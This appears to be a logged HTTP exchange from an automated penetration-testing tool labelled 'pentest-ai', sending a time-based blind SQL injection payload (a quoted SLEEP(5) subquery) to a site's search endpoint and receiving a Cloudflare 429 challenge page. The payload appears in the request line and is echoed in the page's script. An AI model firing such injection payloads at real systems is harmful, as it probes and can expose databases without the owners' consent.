REQUEST:
GET https://my.myfirst.tech/search?q=1%27%20AND%20%28SELECT%20SLEEP%285%29%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:38:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9365
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c846148cbfa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=%2FlYUrWP300FFQn83udUeQ8ptTjCld8m8OMIxQ9EPsIK3jFLMIDJGC5JG5uCu1Ypf6Jzgp3o7VSdYjDIs0GYmaomcdQUyA7yl55wikbl88e%2BSBMIHltLgIhKFphnrBq7%2FLGjKXB6D4uDwmNXsrg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c846148cbfa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'AAloQIC0ZJA3wDU_vu0384aXwKBwPPqGaIQHrj4sMSA-1784281106-1.2.1.1-nyfxdHtzsdo0Q9P7Ceu_U9IxzDwwM1PuwF8TMFK609ANVQpHo.2ntnfD1t0UX1fL',cITimeS: '1784281106',cRay: 'a1c846148cbfa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?q=1%27+AND+%28SELECT+SLEEP%285%29%29--\u0026__cf_chl_tk=znl1Slla80cSW3BbH43nyaqIgP4bRl3uiFTIsZ6y4Yo-1784281106-1.0.1.1-8BEI52KJmAhiKPpfKDw5KJO1wuvHxezdEmDjFh8E8l8",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?q=1%27+AND+%28SELECT+SLEEP%285%29%29--\u0026__cf_chl_f_tk=znl1Slla80cSW3BbH43nyaqIgP4bRl3uiFTIsZ6y4Yo-1784281106-1.0.1.1-8BEI52KJmAhiKPpfKDw5KJO1wuvHxezdEmDjFh8E8l8",md: 'Ms1pGSaS4nQN46RaZdO8pyJEuwsgrjyyJh5KuThGa8Q-1784281106-1.2.1.1-CWSsxk3yspe6wPF.5Lzxt6R4nc0dVVHTjj9oh6eKbzbZIFP7OyxfL1dgTb5d6S3yDvwCUoQyfz5qrLrwpR3GYRWOq.HFE9G.UTai4bc2AtsVubHcSr12XQvX0g.YH4GCwQQ_dgZzlQseNvK28M5kyE_B_sYmbLcVcMzEHjhGLKTraut8QoL4VWz68PsPRbJJe2lP0dRycAFX7LJhXlB2EAOkBD7BRiz7SOj2umL_Sos6YyTenIMfJxLl.NZCli26oYN3PsXKeiPssgd9o.evgmLfKry9ftrjCwRXoVzeoWVdeUtSxNOwftctQzyYiFtFg62jVZScbkGJUkedBNiFEvwtoW5K63qEk9Y0gnvr1G4PlQCcEWH1_lAqiNoYLkDRCxh5KdjHO4K19iL0jZRvAU2z.A8GOYbbbYUbIqMVm.5oviXM1OnjT4CR1I6LmMVEiRLfob7YzoCeQHfp65jRSqkjO91_.AejAP1uVk1WHqg.L5gnU8qYolCrnX2izBNTc9z0Nj4JjqKaez1ci6gGPam2F8PwbK2zgKpYJUimsx_UJZrawP5lDArv9cHPgS4Q7WePFRXujlV3.qTNI4JB1otGcOs._nRO3Jkm0bHKh.nDuhpABL7eQfGkSkAaR__XqSl7J_MArx8C27dcIHkoqIker9sxm8QNCTrJqNTEn0BPYbBHkJeX1xDA8v4JMllpjfbBOlUb7oUT3vn0tP3rktiRDvfE4_2fLTxa.vUlPzMPYbzjh0Pv4ltvafW5SVY2fKSXBSV4xjfIssou8KXjzm2xiD0j4Vkl1uWZk.6lV8s8jMXMDdZiXKE_B.DNlJZ.PJLYesBnKPW.q9GVSPOudYesKg1F7YNn8PAtQa1MSkHIqH26a0eykpWWZUsOXf8FkUFiGEqhtKqjKzsjDAmYFHU0yxADGEPXy5TWtrrMci4gMRvX31JOwlY.hR4TDki2KMLWibH.9vg_xdRJQZkmTlZChFFBlZqx5xA88MNTnCI6ruuGyFsv1mRHUyDbiNl2Vau4NHTj7ERxcJHCbuclCSzD9YLIQa7l4U5aod1MbWIM_dDgJ.s7DoedMtNFkJn.w.uJFNGfXg53qDiwiIvPYz3w77uTWMy0m6iLwSk6yxq.Y7An3Y0spBnsUwgJCdlBePEnAPN6k3uSgs_.R5XWcIPLxTDkRaANCfHdlfQW9Xpzs_jFu.tD7WBk4Bnc7eA4',mdrd: 'tdjga0t1GEtG.qLQ133VBBKqPI_Z3tJ1wOYPigObNrA-1784281106-1.2.1.1-sfco2IQMkywTzU3O0_qfIrlxvxp4oA_Q7DAvCzpUEDBH1GBMeurPulaKRyHetW_8G0aMmJB7pvTD8d.X5X8iCLezri3ddPpOOGfyQpK_Sen7dqTyXRZjAOJ0Sqz1NG22R1h8O8VDee4uHBwwZOV6XLiYyYwguFv2tRJJtoZsNgNWKKMJewNJnGXOVZGQW_QMjwk7hSup8vhhXWSGwgaqGTDV57HtIT_Ii2_HVHOWSAkU1Kb8rZMCj5BaKCBOZAiS',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c846148cbfa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?q=1%27+AND+%28SELECT+SLEEP%285%29%29--\u0026__cf_chl_rt_tk=znl1Slla80cSW3BbH43nyaqIgP4bRl3uiFTIsZ6y4Yo-1784281106-1.0.1.1-8BEI52KJmAhiKPpfKDw5KJO1wuvHxezdEmDjFh8E8l8"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
